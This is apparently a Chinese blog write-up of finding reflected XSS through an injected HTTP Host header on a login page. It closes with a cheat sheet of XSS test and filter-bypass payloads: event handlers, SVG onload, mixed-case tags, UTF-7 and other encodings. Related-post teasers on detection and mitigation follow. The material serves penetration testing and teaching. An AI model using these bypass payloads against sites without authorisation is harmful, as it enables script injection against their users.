第一次在Host头处发现了XSS

最新推荐文章于 2022-11-22 17:02:25 发布
最新推荐文章于 2022-11-22 17:02:25 发布
阅读量1.7k 收藏 8
点赞数 1
分类专栏: 渗透测试总结的方法 文章标签: 渗透测试 host头处xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bul1et/article/details/86141069
版权

某天在挖洞时,噼里啪啦一顿信息收集之后发现了个登陆界面如下:

抓请求包

试着把整个host头的值替换成www.baidu.com

host头的值确实会完全展示在页面中,接下来就是与XSS过滤器的一番殊死搏斗了,payload很简单就被执行了。。。。。。直接在之前的参数后面添加payload: ’;prompt`1`;’(此处省去简单的XSS绕过过程),重放数据包:

刷新前台页面

最后附上常用的验证xss的payload

accesskey="X" οnclick=location="aler"+"t`1`"(按键触发,针对于input标签的hidden属性)<svg/οnlοad=confirm(doucument.domain)>(很多情况,都会忽略svg表签)"><sCrI%20pT%20>PrOmPt('1')</ScrI%20pt>"><sCrI%20pT%20>PrOmPt`1`</ScrI%20pt><script>alert(String.fromCharCode(88,83,83))</script>绕过<>:u003cimg src=1 οnerrοr=alert(/xss/)u003e使用 utf-7 编码可以绕过,比如<script>alert("XSS")</script>使用  UTF-7编码:+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-然后所有的加号需要被改成%2b,否则会被浏览器识别为连接符%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-最后可以将XSS PAYLOAD进行html编码后再进行URL编码,有时候也会有不错的收获。

冲冲_冲
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
一个简单的XSS检测工具
weixin_44611282的博客
06-10 1180
检测的主要流程: 发送随机flag -> 确定参数回显 -> 确定回显位置以及情况(html,js语法解析) -> 根据情况根据不同payload探测 -> 使用html,js语法解析确定是否多出来了标签,属性,js语句等等。 在拿到一个域名后开始深度检索存在的所有链接(href,src),在经过数据清洗后得到有用的页面(去除js等其他目录) def SearchDir(TestUrl): header = { 'User-Agent':
使用java代码方式解决XSSHost Head漏洞问题
gmj53的专栏
08-04 1350
一、使用java代码方式解决XSS漏洞问题 1 ESAPI方式 1.1 引入jar包 compile('org.owasp.esapi:esapi:2.2.3.1') { exclude group: 'log4j', module: 'log4j' exclude group: 'org.slf4j', module: 'slf4j-simple' } 1.2 增加配置文件 1.2.1 ESAPI.properties配置文件内容 # 是否要打印配置属性,默认为true ESAPI.p
web漏洞处理之host攻击
zjw00000的博客
10-14 3240
一、host攻击介绍 1、介绍(这段介绍是从网上copy的,关于它的处理是我自己总结,整理的) 这个Host是在客户端的请求中的,是由客户端提供的,也就是说客户端可以修改这个值。那么,只要是能被客户端修改的值,都是不可信任的。 当Host部被修改为无效Host发生什么情况?大多数web服务器配置为将无法识别的Host传送给列表中的第一台虚拟主机或者返回错误信息。因此,这使得把携带有任...
跨站脚本攻击XSS(最全最细致的靶场实战)
热门推荐
m0_51468027的博客
01-31 3万+
一、XSS跨站漏洞 (1)XSS简介   网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
XSS漏洞检测手段
Kevin's Blog
05-05 7606
文章目录一、手工注入检测1.1 Cheat Sheet二、自动化工具检测2.1 BurpSuite之XSS Validator2.1.1 运行原理2.1.2 插件安装2.1.3 phantomjs安装2.1.4 下载xss.js2.1.5 配置XSS Validator2.1.6 配置Intruder模块2.1.7 XSS漏洞检测2.1.8 工具优缺点2.2 神器之XSSer2.2.1 工具介绍 ...
第一节 自动化xss挖掘介绍-01
最新发布
09-15
xsser是一款功能强大且灵活的自动化XSS挖掘工具,旨在帮助Web安全测试员和开发者快速发现和修复Web应用程序中的XSS漏洞。xsser工具可以自动化地扫描Web应用程序,检测潜在的XSS漏洞,并提供详细的漏洞报告。 xsser...
第一节 XSS跨站脚本分类-01
09-15
反射型 XSS 又称非持久性 XSS,这种攻击往往具有一次性。攻击者通过邮件等形式将包含 XSS 代码的链接发送给正常用户,当用户点击时,服务器接受该用户的请求并进行处理,然后把带有 XSS 的代码发送给用户。用户...
第一节 没有过滤的XSS-01
09-15
第一节 没有过滤的XSS-01
第八节 Javascript伪协议的XSS-01
09-15
"第八节 Javascript伪协议的XSS-01" Javascript伪协议是一种特殊的协议类型,它可以将javascript代码添加到客户端,javascript伪协议的URL中包含javascript代码,浏览器将其解释为javascript语句,并执行之。...
第六节 HTML事件中的XSS-01
09-15
XSS漏洞发现是指攻击者通过在HTML事件处理器中注入恶意代码,来触发XSS漏洞。攻击者可以通过返回Whois信息设置独一无二字符串提交,在响应中寻找XSS漏洞。 闭合思路分析 ------------- 闭合思路分析是指攻击者通过...
DOM型的xss漏洞利用
qq_43814486的博客
04-22 1万+
DOM:通过JavaScript,可以重构整个HTML文档,就是说可以添加,移除等等,对页面的某个东西进行操作时,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM,所以在DOM型的xss漏洞利用中,DOM可以看成是一个访问HTML的标准程序接口。 特征:整个过程都是在前端完成的,没有后端的参与(纯前端的操作!) 原理: 上图var str = docume...
HOST 攻击漏洞
weixin_30387423的博客
06-27 729
日期:2018-03-06 14:32:51 作者:Bay0net 0x01、 前言   在一般情况下,几个网站可能放在同一个服务器上,或者几个 web 系统共享一个服务器,host 来指定应该由哪个网站或者 web 系统来处理用户的请求。 0x02、密码重置漏洞 #!php $user -> hash = random::hash() ; $message -&g...
让你成为网络世界中有破坏力的人-HTTP报文HOST攻击
Eason_LYC安全白帽子的成长博客
05-19 2403
文中有彩蛋哦。随我的文章细细读来,让你成为一个在网络世界中有破坏力的人! tips:请遵守国家相关法律法规。在专用靶场或取得合法授权情况下进行安全渗透测试
Web安全-HTTP Host攻击
道阻且长,行则将至。
12-18 6120
漏洞背景 Host首部字段是HTTP/1.1新增的,旨在告诉服务器,客户端请求的主机名和端口号,主要用来实现虚拟主机技术。 运用虚拟主机技术,单个主机可以运行多个站点。以下图为例,hacker和usagidesign两个站点都运行在同一服务器A上,不管我们请求哪个域名,最终都被解析成服务器A的IP地址,这个时候服务器就不知道该将请求交给哪个站点处理,因此需要Host字段指定请求的主机名。 我们访...
安全漏洞之host攻击漏洞
zhen_hero的博客
03-27 5048
安全漏洞之host攻击漏洞 漏洞描述 渗透测试人员发现,抓包修改host,在返回包中的base标签中的值host值改变,说明存在host攻击漏洞。 漏洞建议 建议使用SERVER_NAME而不是hostheader。 脆弱性评价: 严重程度 高 ...
day35 XSS跨站&反射&存储&DOM&盲打&劫持
wanjia01的博客
11-22 519
知识点:1、XSS跨站-原理&攻击&分类等2、XSS跨站-反射型&存储型&DOM型等3、XSS跨站-攻击手法&劫持&盗取凭据等4、XSS跨站-攻击项目&XSS平台&Beef-XSS1、原理指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行处理或处理不严,则浏览器就直接执行用户注入的脚本。-数据交互的地方。
Nginx: 常见漏洞修复(Host攻击|不安全的Http方法|缺少X-XSS-Protection部)
zJay-L's Blog
03-01 6229
Nginx: 常见漏洞修复(Host攻击|不安全的Http方法|缺少X-XSS-Protection部) Host攻击 在server模块配置: if ($host !~* xxx.xxx.xxx|xxx.ddd.ddd.ddd) { return 403; } 或者 if ($http_Host !~* xxx.xxx.xxx:port|xxx.ddd.ddd.ddd:port) { return 403; } xxx.xxx.xxx:代表域名
在站点上进行简单xss测试脚本
08-30
在进行简单XSS测试脚本时,我们需要先了解XSS的概念。XSS(跨站脚本攻击)是一种常见的Web安全漏洞,其中攻击者通过在受害者的浏览器上执行恶意脚本来利用受害者。为了验证站点是否存在XSS漏洞,我们可以编写简单的XSS测试脚本。 首先,我们需要找到一个可以在站点的输入字段中注入恶意脚本的地方。常见的位置包括搜索框、评论框或表单输入字段。 接下来,我们可以编写一个简单的XSS测试脚本,以尝试在输入字段中注入恶意脚本。一个简单的XSS测试脚本可以包含以下内容: ```javascript <script>alert('XSS测试')</script> ``` 这个脚本将在浏览器中弹出一个警报框,显示"XSS测试"。 我们可以将这个脚本复制粘贴到输入字段中,然后提交或保存。如果站点存在XSS漏洞,那么在其他用户访问这个页面时,他们的浏览器执行这个恶意脚本,弹出警报框。 如果警报框成功弹出,那么站点很可能存在XSS漏洞。此时,我们需要及时通知站点管理员或开发者,以便修复这个漏洞并增强站点的安全性。 需要注意的是,在进行XSS测试脚本时,我们应当遵循一定的道德和法律规范。我们只是为了测试站点的安全性,而不是为了进行恶意攻击。因此,在测试之前,我们应取得站点所有者的明确许可,并遵循相关的法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值